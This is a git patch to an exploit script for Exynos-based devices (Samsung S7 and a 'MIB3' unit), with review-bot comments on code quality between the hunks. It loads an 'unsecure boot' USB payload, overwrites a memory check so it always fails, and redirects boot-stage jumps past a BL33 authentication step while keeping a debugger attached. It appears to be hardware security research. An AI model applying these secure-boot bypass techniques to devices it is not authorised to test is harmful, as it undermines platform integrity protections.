From ef4b266b62e6663dbd341b107e7c1b4598e17af2 Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen
Date: Tue, 12 Nov 2024 20:58:34 +0100
Subject: [PATCH] boots mib3 after BL33. keeps debugger?

---
 source/exploit/.vscode/launch.json | 4 +-
 source/exploit/exploit.py | 61 ++++++++++++++++++++----------
 2 files changed, 43 insertions(+), 22 deletions(-)

diff --git a/source/exploit/.vscode/launch.json b/source/exploit/.vscode/launch.json
index b640638..1498c6d 100644
--- a/source/exploit/.vscode/launch.json
+++ b/source/exploit/.vscode/launch.json
@@ -28,7 +28,7 @@
 "program": "exploit.py",
 "console": "integratedTerminal",
 "justMyCode": false,
- "args": ["--unsecure-boot"]
+ "args": ["--unsecure-boot", "--MIB3"]
 },
 {
 "name": "Run debugger boot",
@@ -37,7 +37,7 @@
 "program": "exploit.py",
 "console": "integratedTerminal",
 "justMyCode": false,
- "args": ["--debugger-boot", "--MIB3"],
+ "args": ["--debugger-boot", "--MIB3"], //, "--MIB3"
 },
 {
 "name": "Debug current file",
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index d17c72b..21bf36e 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -161,28 +161,40 @@ class ExynosDevice():
 ''' Do a normal boot process, with or without exploit. '''
+ bl1 = open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()
+ bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
+ bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
+ bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
+ if args.MIB3:
+ bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
+ bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
+ bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
+ bl33 = open("../mib3/boot_partitions/u-boot_a.bin", "rb").read()
+ off = bl31.find(b'Built')
+ bl31 = bl31[:off] + b'Built' + bl31[off+len(b'Built'):]
+
 if exploit:
 self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
 time.sleep(2)
 self.connect_device()
 # self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin")
- self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
+ self.send_normal_stage(bl1)
 # self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
 # self.send_normal_stage(open("../../dump/rom.bin.1.bin", "rb").read())
 # wait_disconnect()
 time.sleep(2)
 self.connect_device()
- self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
+ self.send_normal_stage(bl31)
 # self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
 # wait_disconnect()
 time.sleep(2)
 self.connect_device()
- self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
+ self.send_normal_stage(bl2)
 # self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
 # wait_disconnect()
 time.sleep(2)
 self.connect_device()
- self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
+ self.send_normal_stage(bl33)
 # self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
 pass
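Review bot: The two added lines `off = bl31.find(b'Built')` and `bl31 = bl31[:off] + b'Built' + bl31[off+len(b'Built'):]` replace the marker with itself, so they are a no-op when the marker is present and silently splice a mangled image when it is absent (`find` returns -1, giving `bl31[:-1] + b'Built' + bl31[4:]`); drop them, or if they are a stub for a later patch, guard them with `if off < 0: raise ValueError("marker not found in bl31")`. The four S7 images are read unconditionally and then discarded under `--MIB3`, and every `open(...).read()` leaves its handle to the garbage collector; an if/else around a small `with`-based reader fixes both, as sketched below. The enclosing method starts before this hunk, so the helper could equally live at class or module level.
```python
        def _read(path):
            # close the handle deterministically instead of leaving open(...).read() to the GC
            with open(path, "rb") as f:
                return f.read()

        if args.MIB3:
            base = "../mib3/boot_partitions/"
            bl1, bl31, bl2, bl33 = (_read(base + name) for name in
                                    ("fwbl1_a.bin", "el3_mon_a.bin", "bl2_a.bin", "u-boot_a.bin"))
        else:
            base = "../S7/g930f_latest/g930f_sboot.bin."
            bl1, bl31, bl2, bl33 = (_read(f"{base}{i}.bin") for i in (1, 2, 3, 4))
        # … unchanged: exploit / connect_device / send_normal_stage sequence …
```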
@@ -757,7 +769,7 @@ class ExynosDevice():
 MMU_CHECK = 0x0202a314
 if not args.MIB3:
 MMU_CHECK = 0x020244e8
- self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
+ self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
 # DWC3 OTG update mode -> Might be useful at some point?
 # self.cd.memwrite_region(0x02021580, struct.pack('>I', 0x00000000))
@@ -765,8 +777,10 @@ class ExynosDevice():
 # Jump into BL31 and execute it
 BL31_POINTER = 0x02024010
 if args.MIB3:
- BL31_POINTER = 0x020c0000
- self.cd.restore_stack_and_jump(BL31_POINTER)
+ BL31_POINTER = 0x0202a010
+ self.cd.restore_stack_and_jump(BL31_POINTER) #BL31_RA_PTR
+ else:
+ self.cd.restore_stack_and_jump(BL31_POINTER)
 # Obligatory reconnect and check of debugger
 time.sleep(2)
@@ -793,11 +807,6 @@ class ExynosDevice():
 self.cd.restore_stack_and_jump(hijacked_fun) # Jumps to function that waits for next boot stage
- # In BL2, find string 'APOLLO' and modify it
- if args.MIB3:
- off = bl2.find(b'APOLLO')
- bl2 = bl2[:off] + b'GUPJE' + bl2[off+6:]
-
 # ==== Stage 4 BL2 ====
 self.send_normal_stage(bl2)
 time.sleep(2)
@@ -814,7 +823,7 @@ class ExynosDevice():
 print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}')
 # Restore bootflow
- print(self.cd.arch_dbg.state.print_ctx())
+ print(self.cd.arch_dbg.state.print_ctx()) # X29 here determines where the 'authentication' is taking place
 BL33_ptr = self.cd.arch_dbg.state.X0
 BL33_LR = self.cd.arch_dbg.state.LR
 self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
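Review bot: In the `BL31_POINTER` hunk both branches of the new if/else end in the same call `self.cd.restore_stack_and_jump(BL31_POINTER)`; if the removed line was the single call that followed the `if` (the collapsed hunk does not show indentation), the split only duplicates it, and `if args.MIB3: BL31_POINTER = 0x0202a010` followed by one `self.cd.restore_stack_and_jump(BL31_POINTER)` is simpler. The trailing `#BL31_RA_PTR` on the MIB3 branch names something that appears nowhere in the hunk; replace it with a comment that says what 0x0202a010 is and how it differs from the S7 value, e.g. `# MIB3 image: BL31 entry lives at a different offset than on the S7 (derived from <how the value was obtained>)`. The first hunk on this line changes only whitespace on the `MMU_CHECK` write and needs no review. The enclosing method starts and ends outside these hunks.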
@@ -826,26 +835,38 @@ class ExynosDevice():
 self.cd.restore_stack_and_jump(hijacked_fun)
 time.sleep(1)
 self.connect_device()
+ self.send_normal_stage(bl33) # Never return/completes
 self.connect_device()
 self.usb_read(0x200) # GiAs
+ #t_lr = self.cd.arch_dbg.state.LR
 # print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
 # off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
 # stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]
+ if args.MIB3:
+ pass
 # Change bootmode to SDCARD (allow normal booting, if pressing volume up)
- self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
- self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
+ if not args.MIB3:
+ self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
+ self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
- # Move default values into registers
- self.cd.memwrite_region(0x8f021bac, struct.pack('>I', 0x20008052))
- self.cd.memwrite_region(0x8f021bdc, struct.pack('>I', 0x20008052))
- self.cd.memwrite_region(0x8f021bbc, struct.pack('>I', 0x20008052))
+ # Move default values into registers
+ self.cd.memwrite_region(0x8f021bac, struct.pack('>I', 0x20008052))
+ self.cd.memwrite_region(0x8f021bdc, struct.pack('>I', 0x20008052))
+ self.cd.memwrite_region(0x8f021bbc, struct.pack('>I', 0x20008052))
+
+ #self.cd.memwrite_region(0xcf08aa4b, b"RRR")
 # Jump into a different function that continues the boot flow (different than BL33_LR)
- self.cd.restore_stack_and_jump(0x02024e5c)
+ BL33_AUTH = 0x02024e5c
+ if args.MIB3:
+ BL33_AUTH = 0x2022ad44
+
+ self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+ self.cd.restore_stack_and_jump(0x202ae18)
 pass
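Review bot: `BL33_AUTH` is set to 0x02024e5c, overridden to 0x2022ad44 under `--MIB3`, and then never read: the jump two lines later hardcodes `0x202ae18`, so the non-MIB3 path no longer jumps to 0x02024e5c as it did before this commit and both assignments are dead. If the fixed target is a temporary experiment, say so in a comment next to it; otherwise the line presumably meant is `self.cd.restore_stack_and_jump(BL33_AUTH)`. `if args.MIB3: pass` before the bootmode writes is a no-op and should be removed or replaced by the MIB3-specific handling it seems to stand in for, and the `# Never return/completes` on the new `send_normal_stage(bl33)` line is at odds with the `connect_device()` that follows, so the comment should state which outcome is expected. Whether the re-added `# Move default values into registers` writes now sit under `if not args.MIB3:` cannot be told from the collapsed hunk; if they do, a comment marking that block as S7-only would make the intent explicit. The enclosing method starts before this hunk.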